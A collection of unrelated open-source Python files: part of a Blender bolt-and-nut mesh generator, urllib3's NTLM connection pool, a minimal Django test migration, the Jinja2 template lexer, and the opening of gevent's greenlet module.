bf_Shank_Dia = FloatProperty(attr='bf_Shank_Dia',
name='Shank Dia', default = 3,
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Diameter of the shank')
bf_Phillips_Bit_Depth = FloatProperty(attr='bf_Phillips_Bit_Depth',
name='Bit Depth', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Depth of the Phillips Bit')
bf_Allen_Bit_Depth = FloatProperty(attr='bf_Allen_Bit_Depth',
name='Bit Depth', default = 1.5,
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Depth of the Allen Bit')
bf_Allen_Bit_Flat_Distance = FloatProperty( attr='bf_Allen_Bit_Flat_Distance',
name='Flat Dist', default = 2.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat Distance of the Allen Bit')
bf_Hex_Head_Height = FloatProperty( attr='bf_Hex_Head_Height',
name='Head Height', default = 2,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Hex Head')
bf_Hex_Head_Flat_Distance = FloatProperty( attr='bf_Hex_Head_Flat_Distance',
name='Flat Dist', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat Distance of the Hex Head')
bf_CounterSink_Head_Dia = FloatProperty( attr='bf_CounterSink_Head_Dia',
name='Head Dia', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Counter Sink Head')
bf_Cap_Head_Height = FloatProperty( attr='bf_Cap_Head_Height',
name='Head Height', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Cap Head')
bf_Cap_Head_Dia = FloatProperty( attr='bf_Cap_Head_Dia',
name='Head Dia', default = 3,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Cap Head')
bf_Dome_Head_Dia = FloatProperty( attr='bf_Dome_Head_Dia',
name='Dome Head Dia', default = 5.6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Length of the unthreaded shank')
bf_Pan_Head_Dia = FloatProperty( attr='bf_Pan_Head_Dia',
name='Pan Head Dia', default = 5.6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Pan Head')
bf_Philips_Bit_Dia = FloatProperty(attr='bf_Philips_Bit_Dia',
name='Bit Dia', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Diameter of the Philips Bit')
bf_Thread_Length = FloatProperty( attr='bf_Thread_Length',
name='Thread Length', default = 6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Length of the Thread')
bf_Major_Dia = FloatProperty( attr='bf_Major_Dia',
name='Major Dia', default = 3,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Outside diameter of the Thread')
bf_Pitch = FloatProperty( attr='bf_Pitch',
name='Pitch', default = 0.35,
min = 0.1, soft_min = 0.1, max = 7.0,
description='Pitch if the thread')
bf_Minor_Dia = FloatProperty( attr='bf_Minor_Dia',
name='Minor Dia', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Inside diameter of the Thread')
bf_Crest_Percent = IntProperty( attr='bf_Crest_Percent',
name='Crest Percent', default = 10,
min = 1, soft_min = 1, max = 90,
description='Percent of the pitch that makes up the Crest')
bf_Root_Percent = IntProperty( attr='bf_Root_Percent',
name='Root Percent', default = 10,
min = 1, soft_min = 1, max = 90,
description='Percent of the pitch that makes up the Root')
bf_Hex_Nut_Height = FloatProperty( attr='bf_Hex_Nut_Height',
name='Hex Nut Height', default = 2.4,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Hex Nut')
bf_Hex_Nut_Flat_Distance = FloatProperty( attr='bf_Hex_Nut_Flat_Distance',
name='Hex Nut Flat Dist', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat distance of the Hex Nut')
presets, presetsPath = getPresets()
bf_presets = EnumProperty(attr='bf_presets',
name='Preset',
description="Use Preset from File",
default='M3.py',
items=presets)
last_preset = None
def draw(self, context):
layout = self.layout
col = layout.column()
#ENUMS
col.prop(self, 'bf_Model_Type')
col.prop(self, 'bf_presets')
col.separator()
#Bit
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Bit_Type')
if self.bf_Bit_Type == 'bf_Bit_None':
pass
elif self.bf_Bit_Type == 'bf_Bit_Allen':
col.prop(self, 'bf_Allen_Bit_Depth')
col.prop(self, 'bf_Allen_Bit_Flat_Distance')
elif self.bf_Bit_Type == 'bf_Bit_Philips':
col.prop(self, 'bf_Phillips_Bit_Depth')
col.prop(self, 'bf_Philips_Bit_Dia')
col.separator()
#Head
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Head_Type')
if self.bf_Head_Type == 'bf_Head_Hex':
col.prop(self, 'bf_Hex_Head_Height')
col.prop(self, 'bf_Hex_Head_Flat_Distance')
elif self.bf_Head_Type == 'bf_Head_Cap':
col.prop(self, 'bf_Cap_Head_Height')
col.prop(self, 'bf_Cap_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_Dome':
col.prop(self, 'bf_Dome_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_Pan':
col.prop(self, 'bf_Pan_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_CounterSink':
col.prop(self, 'bf_CounterSink_Head_Dia')
col.separator()
#Shank
if self.bf_Model_Type == 'bf_Model_Bolt':
col.label(text='Shank')
col.prop(self, 'bf_Shank_Length')
col.prop(self, 'bf_Shank_Dia')
col.separator()
#Nut
if self.bf_Model_Type == 'bf_Model_Nut':
col.prop(self, 'bf_Nut_Type')
col.prop(self, 'bf_Hex_Nut_Height')
col.prop(self, 'bf_Hex_Nut_Flat_Distance')
#Thread
col.label(text='Thread')
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Thread_Length')
col.prop(self, 'bf_Major_Dia')
col.prop(self, 'bf_Minor_Dia')
col.prop(self, 'bf_Pitch')
col.prop(self, 'bf_Crest_Percent')
col.prop(self, 'bf_Root_Percent')
##### POLL #####
@classmethod
def poll(cls, context):
return context.scene != None
##### EXECUTE #####
def execute(self, context):
#print('EXECUTING...')
if not self.last_preset or self.bf_presets != self.last_preset:
#print('setting Preset', self.bf_presets)
setProps(self, self.bf_presets, self.presetsPath)
self.bf_Phillips_Bit_Depth = float(Get_Phillips_Bit_Height(self.bf_Philips_Bit_Dia))
self.last_preset = self.bf_presets
#self.bf_Phillips_Bit_Depth = float(Get_Phillips_Bit_Height(self.bf_Philips_Bit_Dia))
#self.bf_Philips_Bit_Dia = self.bf_Pan_Head_Dia*(1.82/5.6)
#self.bf_Minor_Dia = self.bf_Major_Dia - (1.082532 * self.bf_Pitch)
Create_New_Mesh(self, context, self.align_matrix)
return {'FINISHED'}
##### INVOKE #####
def invoke(self, context, event):
#print('\n___________START_____________')
# store creation_matrix
self.align_matrix = align_matrix(context)
self.execute(context)
return {'FINISHED'}
|
hagifoo/gae-pomodoro | refs/heads/master | app/lib/requests/packages/urllib3/contrib/ntlmpool.py | 714 | # urllib3/contrib/ntlmpool.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s' %
(self.num_connections, self.host, self.authurl))
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % reshdr)
log.debug('Response data: %s [...]' % res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % dict(res.getheaders()))
log.debug('Response data: %s [...]' % res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
|
TridevGuha/django | refs/heads/master | tests/migrations/test_migrations_squashed_erroneous/1_auto.py | 1155 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
operations = [
migrations.RunPython(migrations.RunPython.noop)
]
|
sotdjin/glibglab | refs/heads/master | venv/lib/python2.7/site-packages/jinja2/lexer.py | 346 | # -*- coding: utf-8 -*-
"""
jinja2.lexer
~~~~~~~~~~~~
This module implements a Jinja / Python combination lexer. The
`Lexer` class provided by this module is used to do some preprocessing
for Jinja.
On the one hand it filters out invalid operators like the bitshift
operators we don't allow in templates. On the other hand it separates
template code and python code in expressions.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import re
from operator import itemgetter
from collections import deque
from jinja2.exceptions import TemplateSyntaxError
from jinja2.utils import LRUCache
from jinja2._compat import iteritems, implements_iterator, text_type, \
intern, PY2
# cache for the lexers. Exists in order to be able to have multiple
# environments with the same lexer
_lexer_cache = LRUCache(50)
# static regular expressions
whitespace_re = re.compile(r'\s+', re.U)
string_re = re.compile(r"('([^'\\]*(?:\\.[^'\\]*)*)'"
r'|"([^"\\]*(?:\\.[^"\\]*)*)")', re.S)
integer_re = re.compile(r'\d+')
# we use the unicode identifier rule if this python version is able
# to handle unicode identifiers, otherwise the standard ASCII one.
try:
compile('föö', '<unknown>', 'eval')
except SyntaxError:
name_re = re.compile(r'\b[a-zA-Z_][a-zA-Z0-9_]*\b')
else:
from jinja2 import _stringdefs
name_re = re.compile(r'[%s][%s]*' % (_stringdefs.xid_start,
_stringdefs.xid_continue))
float_re = re.compile(r'(?<!\.)\d+\.\d+')
newline_re = re.compile(r'(\r\n|\r|\n)')
# internal the tokens and keep references to them
TOKEN_ADD = intern('add')
TOKEN_ASSIGN = intern('assign')
TOKEN_COLON = intern('colon')
TOKEN_COMMA = intern('comma')
TOKEN_DIV = intern('div')
TOKEN_DOT = intern('dot')
TOKEN_EQ = intern('eq')
TOKEN_FLOORDIV = intern('floordiv')
TOKEN_GT = intern('gt')
TOKEN_GTEQ = intern('gteq')
TOKEN_LBRACE = intern('lbrace')
TOKEN_LBRACKET = intern('lbracket')
TOKEN_LPAREN = intern('lparen')
TOKEN_LT = intern('lt')
TOKEN_LTEQ = intern('lteq')
TOKEN_MOD = intern('mod')
TOKEN_MUL = intern('mul')
TOKEN_NE = intern('ne')
TOKEN_PIPE = intern('pipe')
TOKEN_POW = intern('pow')
TOKEN_RBRACE = intern('rbrace')
TOKEN_RBRACKET = intern('rbracket')
TOKEN_RPAREN = intern('rparen')
TOKEN_SEMICOLON = intern('semicolon')
TOKEN_SUB = intern('sub')
TOKEN_TILDE = intern('tilde')
TOKEN_WHITESPACE = intern('whitespace')
TOKEN_FLOAT = intern('float')
TOKEN_INTEGER = intern('integer')
TOKEN_NAME = intern('name')
TOKEN_STRING = intern('string')
TOKEN_OPERATOR = intern('operator')
TOKEN_BLOCK_BEGIN = intern('block_begin')
TOKEN_BLOCK_END = intern('block_end')
TOKEN_VARIABLE_BEGIN = intern('variable_begin')
TOKEN_VARIABLE_END = intern('variable_end')
TOKEN_RAW_BEGIN = intern('raw_begin')
TOKEN_RAW_END = intern('raw_end')
TOKEN_COMMENT_BEGIN = intern('comment_begin')
TOKEN_COMMENT_END = intern('comment_end')
TOKEN_COMMENT = intern('comment')
TOKEN_LINESTATEMENT_BEGIN = intern('linestatement_begin')
TOKEN_LINESTATEMENT_END = intern('linestatement_end')
TOKEN_LINECOMMENT_BEGIN = intern('linecomment_begin')
TOKEN_LINECOMMENT_END = intern('linecomment_end')
TOKEN_LINECOMMENT = intern('linecomment')
TOKEN_DATA = intern('data')
TOKEN_INITIAL = intern('initial')
TOKEN_EOF = intern('eof')
# bind operators to token types
operators = {
'+': TOKEN_ADD,
'-': TOKEN_SUB,
'/': TOKEN_DIV,
'//': TOKEN_FLOORDIV,
'*': TOKEN_MUL,
'%': TOKEN_MOD,
'**': TOKEN_POW,
'~': TOKEN_TILDE,
'[': TOKEN_LBRACKET,
']': TOKEN_RBRACKET,
'(': TOKEN_LPAREN,
')': TOKEN_RPAREN,
'{': TOKEN_LBRACE,
'}': TOKEN_RBRACE,
'==': TOKEN_EQ,
'!=': TOKEN_NE,
'>': TOKEN_GT,
'>=': TOKEN_GTEQ,
'<': TOKEN_LT,
'<=': TOKEN_LTEQ,
'=': TOKEN_ASSIGN,
'.': TOKEN_DOT,
':': TOKEN_COLON,
'|': TOKEN_PIPE,
',': TOKEN_COMMA,
';': TOKEN_SEMICOLON
}
reverse_operators = dict([(v, k) for k, v in iteritems(operators)])
assert len(operators) == len(reverse_operators), 'operators dropped'
operator_re = re.compile('(%s)' % '|'.join(re.escape(x) for x in
sorted(operators, key=lambda x: -len(x))))
ignored_tokens = frozenset([TOKEN_COMMENT_BEGIN, TOKEN_COMMENT,
TOKEN_COMMENT_END, TOKEN_WHITESPACE,
TOKEN_LINECOMMENT_BEGIN, TOKEN_LINECOMMENT_END,
TOKEN_LINECOMMENT])
ignore_if_empty = frozenset([TOKEN_WHITESPACE, TOKEN_DATA,
TOKEN_COMMENT, TOKEN_LINECOMMENT])
def _describe_token_type(token_type):
if token_type in reverse_operators:
return reverse_operators[token_type]
return {
TOKEN_COMMENT_BEGIN: 'begin of comment',
TOKEN_COMMENT_END: 'end of comment',
TOKEN_COMMENT: 'comment',
TOKEN_LINECOMMENT: 'comment',
TOKEN_BLOCK_BEGIN: 'begin of statement block',
TOKEN_BLOCK_END: 'end of statement block',
TOKEN_VARIABLE_BEGIN: 'begin of print statement',
TOKEN_VARIABLE_END: 'end of print statement',
TOKEN_LINESTATEMENT_BEGIN: 'begin of line statement',
TOKEN_LINESTATEMENT_END: 'end of line statement',
TOKEN_DATA: 'template data / text',
TOKEN_EOF: 'end of template'
}.get(token_type, token_type)
def describe_token(token):
"""Returns a description of the token."""
if token.type == 'name':
return token.value
return _describe_token_type(token.type)
def describe_token_expr(expr):
"""Like `describe_token` but for token expressions."""
if ':' in expr:
type, value = expr.split(':', 1)
if type == 'name':
return value
else:
type = expr
return _describe_token_type(type)
def count_newlines(value):
"""Count the number of newline characters in the string. This is
useful for extensions that filter a stream.
"""
return len(newline_re.findall(value))
def compile_rules(environment):
"""Compiles all the rules from the environment into a list of rules."""
e = re.escape
rules = [
(len(environment.comment_start_string), 'comment',
e(environment.comment_start_string)),
(len(environment.block_start_string), 'block',
e(environment.block_start_string)),
(len(environment.variable_start_string), 'variable',
e(environment.variable_start_string))
]
if environment.line_statement_prefix is not None:
rules.append((len(environment.line_statement_prefix), 'linestatement',
r'^[ \t\v]*' + e(environment.line_statement_prefix)))
if environment.line_comment_prefix is not None:
rules.append((len(environment.line_comment_prefix), 'linecomment',
r'(?:^|(?<=\S))[^\S\r\n]*' +
e(environment.line_comment_prefix)))
return [x[1:] for x in sorted(rules, reverse=True)]
class Failure(object):
"""Class that raises a `TemplateSyntaxError` if called.
Used by the `Lexer` to specify known errors.
"""
def __init__(self, message, cls=TemplateSyntaxError):
self.message = message
self.error_class = cls
def __call__(self, lineno, filename):
raise self.error_class(self.message, lineno, filename)
class Token(tuple):
"""Token class."""
__slots__ = ()
lineno, type, value = (property(itemgetter(x)) for x in range(3))
def __new__(cls, lineno, type, value):
return tuple.__new__(cls, (lineno, intern(str(type)), value))
def __str__(self):
if self.type in reverse_operators:
return reverse_operators[self.type]
elif self.type == 'name':
return self.value
return self.type
def test(self, expr):
"""Test a token against a token expression. This can either be a
token type or ``'token_type:token_value'``. This can only test
against string values and types.
"""
# here we do a regular string equality check as test_any is usually
# passed an iterable of not interned strings.
if self.type == expr:
return True
elif ':' in expr:
return expr.split(':', 1) == [self.type, self.value]
return False
def test_any(self, *iterable):
"""Test against multiple token expressions."""
for expr in iterable:
if self.test(expr):
return True
return False
def __repr__(self):
return 'Token(%r, %r, %r)' % (
self.lineno,
self.type,
self.value
)
@implements_iterator
class TokenStreamIterator(object):
"""The iterator for tokenstreams. Iterate over the stream
until the eof token is reached.
"""
def __init__(self, stream):
self.stream = stream
def __iter__(self):
return self
def __next__(self):
token = self.stream.current
if token.type is TOKEN_EOF:
self.stream.close()
raise StopIteration()
next(self.stream)
return token
@implements_iterator
class TokenStream(object):
"""A token stream is an iterable that yields :class:`Token`\s. The
parser however does not iterate over it but calls :meth:`next` to go
one token ahead. The current active token is stored as :attr:`current`.
"""
def __init__(self, generator, name, filename):
self._iter = iter(generator)
self._pushed = deque()
self.name = name
self.filename = filename
self.closed = False
self.current = Token(1, TOKEN_INITIAL, '')
next(self)
def __iter__(self):
return TokenStreamIterator(self)
def __bool__(self):
return bool(self._pushed) or self.current.type is not TOKEN_EOF
__nonzero__ = __bool__ # py2
eos = property(lambda x: not x, doc="Are we at the end of the stream?")
def push(self, token):
"""Push a token back to the stream."""
self._pushed.append(token)
def look(self):
"""Look at the next token."""
old_token = next(self)
result = self.current
self.push(result)
self.current = old_token
return result
def skip(self, n=1):
"""Got n tokens ahead."""
for x in range(n):
next(self)
def next_if(self, expr):
"""Perform the token test and return the token if it matched.
Otherwise the return value is `None`.
"""
if self.current.test(expr):
return next(self)
def skip_if(self, expr):
"""Like :meth:`next_if` but only returns `True` or `False`."""
return self.next_if(expr) is not None
def __next__(self):
"""Go one token ahead and return the old one"""
rv = self.current
if self._pushed:
self.current = self._pushed.popleft()
elif self.current.type is not TOKEN_EOF:
try:
self.current = next(self._iter)
except StopIteration:
self.close()
return rv
def close(self):
"""Close the stream."""
self.current = Token(self.current.lineno, TOKEN_EOF, '')
self._iter = None
self.closed = True
def expect(self, expr):
"""Expect a given token type and return it. This accepts the same
argument as :meth:`jinja2.lexer.Token.test`.
"""
if not self.current.test(expr):
expr = describe_token_expr(expr)
if self.current.type is TOKEN_EOF:
raise TemplateSyntaxError('unexpected end of template, '
'expected %r.' % expr,
self.current.lineno,
self.name, self.filename)
raise TemplateSyntaxError("expected token %r, got %r" %
(expr, describe_token(self.current)),
self.current.lineno,
self.name, self.filename)
try:
return self.current
finally:
next(self)
def get_lexer(environment):
"""Return a lexer which is probably cached."""
key = (environment.block_start_string,
environment.block_end_string,
environment.variable_start_string,
environment.variable_end_string,
environment.comment_start_string,
environment.comment_end_string,
environment.line_statement_prefix,
environment.line_comment_prefix,
environment.trim_blocks,
environment.lstrip_blocks,
environment.newline_sequence,
environment.keep_trailing_newline)
lexer = _lexer_cache.get(key)
if lexer is None:
lexer = Lexer(environment)
_lexer_cache[key] = lexer
return lexer
class Lexer(object):
"""Class that implements a lexer for a given environment. Automatically
created by the environment class, usually you don't have to do that.
Note that the lexer is not automatically bound to an environment.
Multiple environments can share the same lexer.
"""
def __init__(self, environment):
# shortcuts
c = lambda x: re.compile(x, re.M | re.S)
e = re.escape
# lexing rules for tags
tag_rules = [
(whitespace_re, TOKEN_WHITESPACE, None),
(float_re, TOKEN_FLOAT, None),
(integer_re, TOKEN_INTEGER, None),
(name_re, TOKEN_NAME, None),
(string_re, TOKEN_STRING, None),
(operator_re, TOKEN_OPERATOR, None)
]
# assemble the root lexing rule. because "|" is ungreedy
# we have to sort by length so that the lexer continues working
# as expected when we have parsing rules like <% for block and
# <%= for variables. (if someone wants asp like syntax)
# variables are just part of the rules if variable processing
# is required.
root_tag_rules = compile_rules(environment)
# block suffix if trimming is enabled
block_suffix_re = environment.trim_blocks and '\\n?' or ''
# strip leading spaces if lstrip_blocks is enabled
prefix_re = {}
if environment.lstrip_blocks:
# use '{%+' to manually disable lstrip_blocks behavior
no_lstrip_re = e('+')
# detect overlap between block and variable or comment strings
block_diff = c(r'^%s(.*)' % e(environment.block_start_string))
# make sure we don't mistake a block for a variable or a comment
m = block_diff.match(environment.comment_start_string)
no_lstrip_re += m and r'|%s' % e(m.group(1)) or ''
m = block_diff.match(environment.variable_start_string)
no_lstrip_re += m and r'|%s' % e(m.group(1)) or ''
# detect overlap between comment and variable strings
comment_diff = c(r'^%s(.*)' % e(environment.comment_start_string))
m = comment_diff.match(environment.variable_start_string)
no_variable_re = m and r'(?!%s)' % e(m.group(1)) or ''
lstrip_re = r'^[ \t]*'
block_prefix_re = r'%s%s(?!%s)|%s\+?' % (
lstrip_re,
e(environment.block_start_string),
no_lstrip_re,
e(environment.block_start_string),
)
comment_prefix_re = r'%s%s%s|%s\+?' % (
lstrip_re,
e(environment.comment_start_string),
no_variable_re,
e(environment.comment_start_string),
)
prefix_re['block'] = block_prefix_re
prefix_re['comment'] = comment_prefix_re
else:
block_prefix_re = '%s' % e(environment.block_start_string)
self.newline_sequence = environment.newline_sequence
self.keep_trailing_newline = environment.keep_trailing_newline
# global lexing rules
self.rules = {
'root': [
# directives
(c('(.*?)(?:%s)' % '|'.join(
[r'(?P<raw_begin>(?:\s*%s\-|%s)\s*raw\s*(?:\-%s\s*|%s))' % (
e(environment.block_start_string),
block_prefix_re,
e(environment.block_end_string),
e(environment.block_end_string)
)] + [
r'(?P<%s_begin>\s*%s\-|%s)' % (n, r, prefix_re.get(n,r))
for n, r in root_tag_rules
])), (TOKEN_DATA, '#bygroup'), '#bygroup'),
# data
(c('.+'), TOKEN_DATA, None)
],
# comments
TOKEN_COMMENT_BEGIN: [
(c(r'(.*?)((?:\-%s\s*|%s)%s)' % (
e(environment.comment_end_string),
e(environment.comment_end_string),
block_suffix_re
)), (TOKEN_COMMENT, TOKEN_COMMENT_END), '#pop'),
(c('(.)'), (Failure('Missing end of comment tag'),), None)
],
# blocks
TOKEN_BLOCK_BEGIN: [
(c('(?:\-%s\s*|%s)%s' % (
e(environment.block_end_string),
e(environment.block_end_string),
block_suffix_re
)), TOKEN_BLOCK_END, '#pop'),
] + tag_rules,
# variables
TOKEN_VARIABLE_BEGIN: [
(c('\-%s\s*|%s' % (
e(environment.variable_end_string),
e(environment.variable_end_string)
)), TOKEN_VARIABLE_END, '#pop')
] + tag_rules,
# raw block
TOKEN_RAW_BEGIN: [
(c('(.*?)((?:\s*%s\-|%s)\s*endraw\s*(?:\-%s\s*|%s%s))' % (
e(environment.block_start_string),
block_prefix_re,
e(environment.block_end_string),
e(environment.block_end_string),
block_suffix_re
)), (TOKEN_DATA, TOKEN_RAW_END), '#pop'),
(c('(.)'), (Failure('Missing end of raw directive'),), None)
],
# line statements
TOKEN_LINESTATEMENT_BEGIN: [
(c(r'\s*(\n|$)'), TOKEN_LINESTATEMENT_END, '#pop')
] + tag_rules,
# line comments
TOKEN_LINECOMMENT_BEGIN: [
(c(r'(.*?)()(?=\n|$)'), (TOKEN_LINECOMMENT,
TOKEN_LINECOMMENT_END), '#pop')
]
}
def _normalize_newlines(self, value):
"""Called for strings and template data to normalize it to unicode."""
return newline_re.sub(self.newline_sequence, value)
def tokenize(self, source, name=None, filename=None, state=None):
"""Calls tokeniter + tokenize and wraps it in a token stream.
"""
stream = self.tokeniter(source, name, filename, state)
return TokenStream(self.wrap(stream, name, filename), name, filename)
def wrap(self, stream, name=None, filename=None):
"""This is called with the stream as returned by `tokenize` and wraps
every token in a :class:`Token` and converts the value.
"""
for lineno, token, value in stream:
if token in ignored_tokens:
continue
elif token == 'linestatement_begin':
token = 'block_begin'
elif token == 'linestatement_end':
token = 'block_end'
# we are not interested in those tokens in the parser
elif token in ('raw_begin', 'raw_end'):
continue
elif token == 'data':
value = self._normalize_newlines(value)
elif token == 'keyword':
token = value
elif token == 'name':
value = str(value)
elif token == 'string':
# try to unescape string
try:
value = self._normalize_newlines(value[1:-1]) \
.encode('ascii', 'backslashreplace') \
.decode('unicode-escape')
except Exception as e:
msg = str(e).split(':')[-1].strip()
raise TemplateSyntaxError(msg, lineno, name, filename)
# if we can express it as bytestring (ascii only)
# we do that for support of semi broken APIs
# as datetime.datetime.strftime. On python 3 this
# call becomes a noop thanks to 2to3
if PY2:
try:
value = value.encode('ascii')
except UnicodeError:
pass
elif token == 'integer':
value = int(value)
elif token == 'float':
value = float(value)
elif token == 'operator':
token = operators[value]
yield Token(lineno, token, value)
def tokeniter(self, source, name, filename=None, state=None):
"""This method tokenizes the text and returns the tokens in a
generator. Use this method if you just want to tokenize a template.
"""
source = text_type(source)
lines = source.splitlines()
if self.keep_trailing_newline and source:
for newline in ('\r\n', '\r', '\n'):
if source.endswith(newline):
lines.append('')
break
source = '\n'.join(lines)
pos = 0
lineno = 1
stack = ['root']
if state is not None and state != 'root':
assert state in ('variable', 'block'), 'invalid state'
stack.append(state + '_begin')
else:
state = 'root'
statetokens = self.rules[stack[-1]]
source_length = len(source)
balancing_stack = []
while 1:
# tokenizer loop
for regex, tokens, new_state in statetokens:
m = regex.match(source, pos)
# if no match we try again with the next rule
if m is None:
continue
# we only match blocks and variables if braces / parentheses
# are balanced. continue parsing with the lower rule which
# is the operator rule. do this only if the end tags look
# like operators
if balancing_stack and \
tokens in ('variable_end', 'block_end',
'linestatement_end'):
continue
# tuples support more options
if isinstance(tokens, tuple):
for idx, token in enumerate(tokens):
# failure group
if token.__class__ is Failure:
raise token(lineno, filename)
# bygroup is a bit more complex, in that case we
# yield for the current token the first named
# group that matched
elif token == '#bygroup':
for key, value in iteritems(m.groupdict()):
if value is not None:
yield lineno, key, value
lineno += value.count('\n')
break
else:
raise RuntimeError('%r wanted to resolve '
'the token dynamically'
' but no group matched'
% regex)
# normal group
else:
data = m.group(idx + 1)
if data or token not in ignore_if_empty:
yield lineno, token, data
lineno += data.count('\n')
# strings as token just are yielded as it.
else:
data = m.group()
# update brace/parentheses balance
if tokens == 'operator':
if data == '{':
balancing_stack.append('}')
elif data == '(':
balancing_stack.append(')')
elif data == '[':
balancing_stack.append(']')
elif data in ('}', ')', ']'):
if not balancing_stack:
raise TemplateSyntaxError('unexpected \'%s\'' %
data, lineno, name,
filename)
expected_op = balancing_stack.pop()
if expected_op != data:
raise TemplateSyntaxError('unexpected \'%s\', '
'expected \'%s\'' %
(data, expected_op),
lineno, name,
filename)
# yield items
if data or tokens not in ignore_if_empty:
yield lineno, tokens, data
lineno += data.count('\n')
# fetch new position into new variable so that we can check
# if there is a internal parsing error which would result
# in an infinite loop
pos2 = m.end()
# handle state changes
if new_state is not None:
# remove the uppermost state
if new_state == '#pop':
stack.pop()
# resolve the new state by group checking
elif new_state == '#bygroup':
for key, value in iteritems(m.groupdict()):
if value is not None:
stack.append(key)
break
else:
raise RuntimeError('%r wanted to resolve the '
'new state dynamically but'
' no group matched' %
regex)
# direct state name given
else:
stack.append(new_state)
statetokens = self.rules[stack[-1]]
# we are still at the same position and no stack change.
# this means a loop without break condition, avoid that and
# raise error
elif pos2 == pos:
raise RuntimeError('%r yielded empty string without '
'stack change' % regex)
# publish new function and start again
pos = pos2
break
# if loop terminated without break we haven't found a single match
# either we are at the end of the file or we have a problem
else:
# end of text
if pos >= source_length:
return
# something went wrong
raise TemplateSyntaxError('unexpected char %r at %d' %
(source[pos], pos), lineno,
name, filename)
|
hexlism/xx_net | refs/heads/master | python27/1.0/lib/darwin/gevent/greenlet.py | 22 | # Copyright (c) 2009-2012 Denis Bilenko. See LICENSE for details.
import sys
from gevent.hub import greenlet, getcurrent, get_hub, GreenletExit, Waiter, PY3, iwait, wait
from gevent.timeout import Timeout
from collections import deque
__all__ = ['Greenlet',
'joinall',
'killall']
class SpawnedLink(object):
"""A wrapper around link that calls it in another greenlet.
Can be called only from main loop.
"""
__slots__ = ['callback']
